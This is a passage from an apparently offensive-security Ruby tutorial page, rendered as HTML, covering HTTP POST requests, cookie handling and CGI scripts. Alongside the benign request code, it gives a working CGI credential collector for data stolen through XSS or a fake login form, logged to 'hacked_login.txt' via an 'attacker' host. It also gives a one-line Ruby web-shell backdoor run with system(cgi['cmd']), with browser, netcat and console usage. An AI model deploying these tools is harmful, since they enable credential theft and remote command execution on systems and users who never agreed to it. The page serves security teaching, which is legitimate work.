<span class="hljs-tag"><<span class="hljs-title">OPTION</span>></span>pizza<span class="hljs-tag"><<span class="hljs-title">OPTION</span>></span>hamburgers<span class="hljs-tag"><<span class="hljs-title">OPTION</span> <span class="hljs-attribute">SELECTED</span>></span>spinich<span class="hljs-tag"><<span class="hljs-title">OPTION</span>></span>mashed potatoes<span class="hljs-tag"><<span class="hljs-title">OPTION</span>></span>other
|
1327
|
+
<span class="hljs-tag"></<span class="hljs-title">SELECT</span>></span>
|
1328
|
+
|
1329
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Reset: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"reset"</span> ></span>
|
1330
|
+
|
1331
|
+
<span class="hljs-tag"><<span class="hljs-title">P</span>></span>Submit: <span class="hljs-tag"><<span class="hljs-title">INPUT</span> <span class="hljs-attribute">TYPE</span>=<span class="hljs-value">"submit"</span> <span class="hljs-attribute">NAME</span>=<span class="hljs-value">"submitbutton"</span> <span class="hljs-attribute">VALUE</span>=<span class="hljs-value">"Do it!"</span> <span class="hljs-attribute">ACTION</span>=<span class="hljs-value">"SEND"</span>></span>
|
1332
|
+
<span class="hljs-tag"></<span class="hljs-title">FORM</span>></span>
|
1333
|
+
</code></pre>
|
1334
|
+
<p>We need to send a Post request as the form figure 1 would do with control on each value and variable.</p>
|
1335
|
+
<pre><code class="lang-ruby"><span class="hljs-keyword">require</span> <span class="hljs-string">"net/http"</span>
|
1336
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">"uri"</span>
|
1337
|
+
|
1338
|
+
<span class="hljs-comment"># Parsing the URL and instantiate http</span>
|
1339
|
+
uri = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"http://wwwx.cs.unc.edu/~jbs/aw-wwwp/docs/resources/perl/perl-cgi/programs/cgi_stdin.cgi"</span>)
|
1340
|
+
http = <span class="hljs-constant">Net::HTTP</span>.new(uri.host, uri.port)
|
1341
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1342
|
+
|
1343
|
+
<span class="hljs-comment"># Instantiate HTTP Post request</span>
|
1344
|
+
request = <span class="hljs-constant">Net::HTTP::Post</span>.new(uri.request_uri)
|
1345
|
+
|
1346
|
+
<span class="hljs-comment"># Headers</span>
|
1347
|
+
request[<span class="hljs-string">"Accept"</span>] = <span class="hljs-string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>
|
1348
|
+
request[<span class="hljs-string">"User-Agent"</span>] = <span class="hljs-string">"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0"</span>
|
1349
|
+
request[<span class="hljs-string">"Referer"</span>] = <span class="hljs-string">"http://www.cs.unc.edu/~jbs/resources/perl/perl-cgi/programs/form1-POST.html"</span>
|
1350
|
+
request[<span class="hljs-string">"Connection"</span>] = <span class="hljs-string">"keep-alive"</span>
|
1351
|
+
request[<span class="hljs-string">"Accept-Language"</span>] = <span class="hljs-string">"en-US,en;q=0.5"</span>
|
1352
|
+
request[<span class="hljs-string">"Accept-Encoding"</span>] = <span class="hljs-string">"gzip, deflate"</span>
|
1353
|
+
request[<span class="hljs-string">"Content-Type"</span>] = <span class="hljs-string">"application/x-www-form-urlencoded"</span>
|
1354
|
+
|
1355
|
+
<span class="hljs-comment"># Post body</span>
|
1356
|
+
request.set_form_data({
|
1357
|
+
<span class="hljs-string">"name"</span> => <span class="hljs-string">"My title is here"</span>,
|
1358
|
+
<span class="hljs-string">"textarea"</span> => <span class="hljs-string">"My grate message here."</span>,
|
1359
|
+
<span class="hljs-string">"radiobutton"</span> => <span class="hljs-string">"middleun"</span>,
|
1360
|
+
<span class="hljs-string">"checkedbox"</span> => <span class="hljs-string">"pizza"</span>,
|
1361
|
+
<span class="hljs-string">"checkedbox"</span> => <span class="hljs-string">"hamburgers"</span>,
|
1362
|
+
<span class="hljs-string">"checkedbox"</span> => <span class="hljs-string">"mashed potatoes"</span>,
|
1363
|
+
<span class="hljs-string">"selectitem"</span> => <span class="hljs-string">"hamburgers"</span>,
|
1364
|
+
<span class="hljs-string">"submitbutton"</span> => <span class="hljs-string">"Do it!"</span>
|
1365
|
+
})
|
1366
|
+
|
1367
|
+
<span class="hljs-comment"># Receive the response</span>
|
1368
|
+
response = http.request(request)
|
1369
|
+
|
1370
|
+
puts <span class="hljs-string">"Status code: "</span> + response.code
|
1371
|
+
puts <span class="hljs-string">"Response body: "</span> + response.body
|
1372
|
+
</code></pre>
|
1373
|
+
<h2 id="dealing-with-cookies"><a name="dealing-with-cookies" class="plugin-anchor" href="#dealing-with-cookies"><span class="fa fa-link"></span></a>Dealing with Cookies</h2>
|
1374
|
+
<p>Some times you need to deal with some actions after authentication. Ideally, it's all about cookies.</p>
|
1375
|
+
<p>Notes: </p>
|
1376
|
+
<ul>
|
1377
|
+
<li>To Read cookies you need to get <strong>set-cookie</strong> from <strong>response</strong></li>
|
1378
|
+
<li>To Set cookies you need to set <strong>Cookie</strong> to <strong>request</strong> </li>
|
1379
|
+
</ul>
|
1380
|
+
<pre><code class="lang-ruby">puts <span class="hljs-string">"[*] Logging-in"</span>
|
1381
|
+
uri1 = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"http://host/login.aspx"</span>)
|
1382
|
+
uri2 = <span class="hljs-constant">URI</span>.parse(<span class="hljs-string">"http://host/report.aspx"</span>)
|
1383
|
+
|
1384
|
+
<span class="hljs-constant">Net::HTTP</span>.start(uri1.host, uri1.port) <span class="hljs-keyword">do</span> |http|
|
1385
|
+
http.use_ssl = <span class="hljs-keyword">true</span> <span class="hljs-keyword">if</span> uri1.scheme == <span class="hljs-string">'https'</span> <span class="hljs-comment"># Enable HTTPS support if it's HTTPS</span>
|
1386
|
+
puts <span class="hljs-string">"[*] Logging in"</span>
|
1387
|
+
p_request = <span class="hljs-constant">Net::HTTP::Post</span>.new(uri1)
|
1388
|
+
p_request.set_form_data({<span class="hljs-string">"loginName"</span>=><span class="hljs-string">"admin"</span>, <span class="hljs-string">"password"</span>=><span class="hljs-string">"P@ssw0rd"</span>})
|
1389
|
+
p_response = http.request(p_request)
|
1390
|
+
cookies = p_response.response[<span class="hljs-string">'set-cookie'</span>] <span class="hljs-comment"># Save Cookies</span>
|
1391
|
+
|
1392
|
+
puts <span class="hljs-string">"[*] Do Post-authentication actions"</span>
|
1393
|
+
<span class="hljs-constant">Net::HTTP::Get</span>.new(uri2)
|
1394
|
+
g_request = <span class="hljs-constant">Net::HTTP::Get</span>.new(uri2)
|
1395
|
+
g_request[<span class="hljs-string">'Cookie'</span>] = cookies <span class="hljs-comment"># Restore Saved Cookies</span>
|
1396
|
+
g_response = http.request(g_request)
|
1397
|
+
<span class="hljs-keyword">end</span>
|
1398
|
+
</code></pre>
|
1399
|
+
<h2 id="cgi"><a name="cgi" class="plugin-anchor" href="#cgi"><span class="fa fa-link"></span></a>CGI</h2>
|
1400
|
+
<h3 id="get-info--from-xsshtmli-exploitation"><a name="get-info--from-xsshtmli-exploitation" class="plugin-anchor" href="#get-info--from-xsshtmli-exploitation"><span class="fa fa-link"></span></a>Get info - from XSS/HTMLi exploitation</h3>
|
1401
|
+
<p>When you exploit XSS or HTML injection you may need to receive the grepped data from exploited user to your external server. Here a simple example of CGI script take sent get request from fake login from that asks users to enter log-in with username and password then will store the data to <code>hacked_login.txt</code> text file and fix its permissions to assure that nobody can access that file from public.</p>
|
1402
|
+
<p>Add the following to <code>/etc/apache2/sites-enabled/[SITE]</code> then restart the service</p>
|
1403
|
+
<pre><code><Directory /var/www/[CGI FOLDER]>
|
1404
|
+
AddHandler cgi-script .rb
|
1405
|
+
Options +ExecCGI
|
1406
|
+
</Directory>
|
1407
|
+
</code></pre><p>Now, put the script in /var/www/[CGI FOLDER]. You can use it now.</p>
|
1408
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/ruby</span>
|
1409
|
+
<span class="hljs-comment"># CGI script gets user/pass | http://attacker/info.rb?user=USER&pass=PASS</span>
|
1410
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'cgi'</span>
|
1411
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'uri'</span>
|
1412
|
+
|
1413
|
+
cgi = <span class="hljs-constant">CGI</span>.new
|
1414
|
+
cgi.header <span class="hljs-comment"># content type 'text/html'</span>
|
1415
|
+
user = <span class="hljs-constant">URI</span>.encode cgi[<span class="hljs-string">'user'</span>]
|
1416
|
+
pass = <span class="hljs-constant">URI</span>.encode cgi[<span class="hljs-string">'pass'</span>]
|
1417
|
+
time = <span class="hljs-constant">Time</span>.now.strftime(<span class="hljs-string">"%D %T"</span>)
|
1418
|
+
|
1419
|
+
file = <span class="hljs-string">'hacked_login.txt'</span>
|
1420
|
+
<span class="hljs-constant">File</span>.open(file, <span class="hljs-string">"a"</span>) <span class="hljs-keyword">do</span> |f|
|
1421
|
+
f.puts time <span class="hljs-comment"># Time of receiving the get request</span>
|
1422
|
+
f.puts <span class="hljs-string">"<span class="hljs-subst">#{<span class="hljs-constant">URI</span>.decode user}</span>:<span class="hljs-subst">#{<span class="hljs-constant">URI</span>.decode pass}</span>"</span> <span class="hljs-comment"># The data</span>
|
1423
|
+
f.puts cgi.remote_addr <span class="hljs-comment"># Remote user IP</span>
|
1424
|
+
f.puts cgi.referer <span class="hljs-comment"># The vulnerable site URL</span>
|
1425
|
+
f.puts <span class="hljs-string">"---------------------------"</span>
|
1426
|
+
<span class="hljs-keyword">end</span>
|
1427
|
+
<span class="hljs-constant">File</span>.chmod(<span class="hljs-number">0200</span>, file) <span class="hljs-comment"># To prevent public access to the log file</span>
|
1428
|
+
|
1429
|
+
puts <span class="hljs-string">""</span>
|
1430
|
+
</code></pre>
|
1431
|
+
<h3 id="web-shell1--command-execution-via-get"><a name="web-shell1--command-execution-via-get" class="plugin-anchor" href="#web-shell1--command-execution-via-get"><span class="fa fa-link"></span></a>Web Shell<sup><a href="#fn_1" id="reffn_1">1</a></sup> - command execution via GET</h3>
|
1432
|
+
<p>if you have a server that supports ruby CGI, you can use the following as backdoor</p>
|
1433
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1434
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'cgi'</span>
|
1435
|
+
cgi = <span class="hljs-constant">CGI</span>.new
|
1436
|
+
puts cgi.header
|
1437
|
+
system(cgi[<span class="hljs-string">'cmd'</span>])
|
1438
|
+
</code></pre>
|
1439
|
+
<p>Now you can simply use a web browser, Netcat or WebShellConsole<sup><a href="#fn_1" id="reffn_1">1</a></sup> to execute your commands.
|
1440
|
+
ex.
|
1441
|
+
<strong>Browser</strong></p>
|
1442
|
+
<pre><code>http://host/cgi/shell.rb?cmd=ls -la
|
1443
|
+
</code></pre><p><strong>Netcat</strong></p>
|
1444
|
+
<pre><code>echo "GET /cgi/shell.rb?cmd=ls%20-la" | nc host 80
|
1445
|
+
</code></pre><p><strong>WebShellConsole</strong></p>
|
1446
|
+
<p>run wsc</p>
|
1447
|
+
<pre><code>ruby wsc.rb
|
1448
|
+
</code></pre><p>Add Shell URL</p>
|
1449
|
+
<pre><code>Shell -> set http://host/cgi/shell.rb?cmd=
|
1450
|
+
</code></pre><p>Now prompt your commands</p>
|
1451
|
+
<pre><code>Shell -> ls -la
|
1452
|
+
</code></pre><h2 id="mechanize"><a name="mechanize" class="plugin-anchor" href="#mechanize"><span class="fa fa-link"></span></a>Mechanize</h2>
|
1453
|
+
<p>Since we're talking about dealing with web in ruby, we can't forget <strong>Mechanize</strong> gem, the most known library for dealing wit web.</p>
|
1454
|
+
<p><strong>The Official description says</strong>, the Mechanize library is used for automating interaction with websites. Mechanize automatically stores and sends cookies, follows redirects, and can follow links and submit forms. Form fields can be populated and submitted. Mechanize also keeps track of the sites that you have visited as a history.</p>
|
1455
|
+
<p>More about Mechanize gem</p>
|
1456
|
+
<ul>
|
1457
|
+
<li><a href="http://docs.seattlerb.org/mechanize/GUIDE_rdoc.html" target="_blank">Getting Started With Mechanize</a></li>
|
1458
|
+
<li><a href="http://docs.seattlerb.org/mechanize/EXAMPLES_rdoc.html" target="_blank">Mechanize examples</a></li>
|
1459
|
+
<li><a href="http://railscasts.com/episodes/191-mechanize" target="_blank">RailsCasts | Mechanize tutorial</a></li>
|
1460
|
+
</ul>
|
1461
|
+
<p>Since you know the hard way, you'll find Mechanize as simple as mouse clicks! give it a try!</p>
|
1462
|
+
<h2 id="httprb"><a name="httprb" class="plugin-anchor" href="#httprb"><span class="fa fa-link"></span></a>HTTP.rb</h2>
|
1463
|
+
<p>HTTP (The Gem! a.k.a. http.rb) is an easy-to-use client library for making requests from Ruby. It uses a simple method chaining system for building requests, similar to Python's Requests.</p>
|
1464
|
+
<p>Under the hood, http.rb uses http_parser.rb, a fast HTTP parsing native extension based on the Node.js parser and a Java port thereof. This library isn't just yet another wrapper around Net::HTTP. It implements the HTTP protocol natively and outsources the parsing to native extensions.</p>
|
1465
|
+
<p>More about http.rb gem</p>
|
1466
|
+
<ul>
|
1467
|
+
<li><a href="https://github.com/httprb/http" target="_blank">The Official repository</a></li>
|
1468
|
+
<li><a href="https://github.com/httprb/http/wiki" target="_blank">The official wiki</a></li>
|
1469
|
+
</ul>
|
1470
|
+
<h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
|
1471
|
+
<blockquote id="fn_1">
|
1472
|
+
<sup>1</sup>. <a href="https://github.com/KINGSABRI/WebShellConsole" target="_blank">WebShellConsole</a> is simple interactive console, interacts with simple web shells using HTTP GET rather than using browser. wsc will work with any shell use GET method. It takes care of all URL encoding too.<a href="#reffn_1" title="Jump back to footnote [1] in the text."> ↩</a>
|
1473
|
+
</blockquote>
|
1474
|
+
<ul>
|
1475
|
+
<li><a href="http://www.java2s.com/Code/Ruby/CGI/CatalogCGI.htm" target="_blank">CGI Examples</a></li>
|
1476
|
+
</ul>
|
1477
|
+
|
1478
|
+
|
1479
|
+
</section>
|
1480
|
+
|
1481
|
+
|
1482
|
+
</div>
|
1483
|
+
</div>
|
1484
|
+
</div>
|
1485
|
+
|
1486
|
+
|
1487
|
+
<a href="../module_0x3__network_kung_fu/dns_spoofing.html" class="navigation navigation-prev " aria-label="Previous page: DNS Spoofing"><i class="fa fa-angle-left"></i></a>
|
1488
|
+
|
1489
|
+
|
1490
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html" class="navigation navigation-next " aria-label="Next page: SQL Injection Scanner"><i class="fa fa-angle-right"></i></a>
|
1491
|
+
|
1492
|
+
</div>
|
1493
|
+
</div>
|
1494
|
+
|
1495
|
+
|
1496
|
+
<script src="../gitbook/app.js"></script>
|
1497
|
+
|
1498
|
+
|
1499
|
+
<script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
|
1500
|
+
|
1501
|
+
|
1502
|
+
|
1503
|
+
<script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
|
1504
|
+
|
1505
|
+
|
1506
|
+
|
1507
|
+
<script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
|
1508
|
+
|
1509
|
+
|
1510
|
+
|
1511
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
|
1512
|
+
|
1513
|
+
|
1514
|
+
|
1515
|
+
<script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
|
1516
|
+
|
1517
|
+
|
1518
|
+
|
1519
|
+
<script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
|
1520
|
+
|
1521
|
+
|
1522
|
+
|
1523
|
+
<script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
|
1524
|
+
|
1525
|
+
|
1526
|
+
<script>
|
1527
|
+
require(["gitbook"], function(gitbook) {
|
1528
|
+
var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
|
1529
|
+
gitbook.start(config);
|
1530
|
+
});
|
1531
|
+
</script>
|
1532
|
+
|
1533
|
+
|
1534
|
+
</body>
|
1535
|
+
|
1536
|
+
</html>
|